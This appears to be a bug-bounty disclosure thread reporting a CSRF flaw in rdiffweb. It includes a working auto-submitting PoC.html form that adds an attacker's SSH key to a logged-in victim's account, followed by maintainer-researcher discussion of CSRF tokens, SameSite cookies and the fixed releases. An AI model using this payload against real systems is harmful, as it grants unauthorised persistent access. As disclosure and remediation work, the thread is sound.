Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb

Valid

Reported on

Sep 11th 2021


✍️ Description

Hello dear Rdiffweb team.

I found a CSRF vulnerability on following endpoint that attackers able to Create a SSH key with PoC.html

🕵️‍♂️ Proof of Concept

  1. User with right privileges should be logged in Firefox or Safari.

  2. Users go to a website that contain PoC.html

3.after visiting attacker's website a SSH key with name bob@thinkpad-t530 will be created. // PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://rdiffweb-demo.ikus-soft.com/prefs/sshkeys" method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="title" value="bob&#64;thinkpad&#45;t530&#32;" />
      <input type="hidden" name="key" value="ssh&#45;rsa&#13;&#10;MIICXAIBAAKBgQCpPefILQKzndiaxLp6M9&#43;AlfZv&#47;UahWXRrZgrGJb8kT8yeCa9U&#13;&#10;zqtsOlWi58Akp1U3TxMdizqLKA9ivrAFXNc&#47;U&#47;HkqeB73GIprPvYkiL&#43;&#43;UxpJQKL&#13;&#10;bY2ybZK1&#43;I5mWiaGhNec3KSvaTRKXQZpCYnKNM8smlLPc85a3MZs0&#47;iIKQIDAQAB&#13;&#10;AoGAcf3eVjfq7&#43;xLbsM&#47;DvxNeCCJ4phnsFm&#43;TnBmpVvbSKvvGCtRyv&#43;A&#43;t63u4f5&#13;&#10;JTcH8L70ExwqDHypEEt758DGwSa&#43;p7yfxYYNLcmTfjI&#43;Hiqc05WpouwDcCeFvWwH&#13;&#10;Hrcg&#47;&#43;bbcY17G9PPn54Gcl5LUd0bNFd8hBwzdoKf0OdkX7kCQQD05SMnQNZxdgTG&#13;&#10;4BHK1J&#43;Uh2HNDruk6TilPyejPGlGKU72Y&#47;Awt2GQv0ejHIYJznkDgQ2ic3q3yvzX&#13;&#10;SKZsWvM7AkEAsOqMQIwf0nw3I7zgFsTCsw6Bu46Sot&#47;Qm0bZhNaDfyRGt5LodW5t&#13;&#10;aZkBZPZyMe8GNvKY1Y7KVPKRYYndJKuz6wJBAOTdS1gA2SfZ8qblettCkAxf5T&#43;c&#13;&#10;&#43;DIrHxwXhHSiHYRLUJclWLA&#43;gPikOk&#43;udXmusxtaPSLHpzUih96t75IuAUcCQHy8&#13;&#10;MjzETx95ourYnWqQOfJDFScnI64gfZUtQ&#43;oL0NTQv&#43;dodett&#43;0iLr1b&#47;B467Rzdw&#13;&#10;nl9b&#43;L4h9Gy&#47;5iKXyRcCQCoyLH3foTFcEigySYkgdfdGv9LpWDPb9y0c2pbGJDcr&#13;&#10;6moUZy5AQ3r4oJmpYoJQWpzUKk5FGTBkSnHo917J9Mg&#61;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Also attacker can send multiple request with help of Iframes.

Fix

I just want to suggest you to set a CSRF token for this form.

Ziding Zhang
3 months ago

Admin


Hey amammad, I've opened a PR on the repo asking for a security policy with email.

amammad
2 months ago

Researcher


@admin hey admin

They already put theier email in 25 days ago !!!

We have contacted a member of the ikus060/rdiffweb team and are waiting to hear back 2 months ago
Jamie Slome
2 months ago

Admin


Sorted! ♥️

Patrik Dufresne validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrik Dufresne confirmed that a fix has been merged on fc257f 2 months ago
The fix bounty has been dropped
Patrik Dufresne
2 months ago

Maintainer


Changes are made and releases as 2.3.5

Patrik Dufresne
a month ago

Maintainer


@amammad

I'm working on a different implementation because adding csrf token in every form break few integration for my customer. That said, I'm working on another mitigation to validate the Origin and Referer. That should cover all endpoint and future endpoint too.

Any thought on the subject ?

amammad
a month ago

Researcher


first option:

You can set SameSite attribute to strict for all cookies and I heard that this can be make some problems that I don't know what kind of problems.

second option:

But you can Also set SameSite attribute to Lax for all cookies that it is a appropriate options But beside Lax you should only accept request with http POST method and use GET method Only when clients want to receive information not change them.

with these two options you can have protection against CSRF protection.

amammad
a month ago

Researcher


In my opinion checking for origin header is non-standard and old implementation as we have SameSite attribute for cookies there isn't need to implement something else.

I thing you can read about strict SameSite and then if you didn't find any problem, this can the easiest fix.

Patrik Dufresne
a month ago

Maintainer


@amammad

I'm glad you talked about SameSite=Lax, I've also added this functionalities yesterday. I will complete the changes by adding unit test for all of this and it should be good.

Thanks !

amammad
a month ago

Researcher


Your Welcome, happy to hear about the fixes.

amammad
a month ago

Researcher


When you finish the tests you and release new version you can put comment here and if I found more CSRF issues I will report them from Huntr.

Patrik Dufresne
a month ago

Maintainer


Changes are completed and release in rdiffweb 2.3.7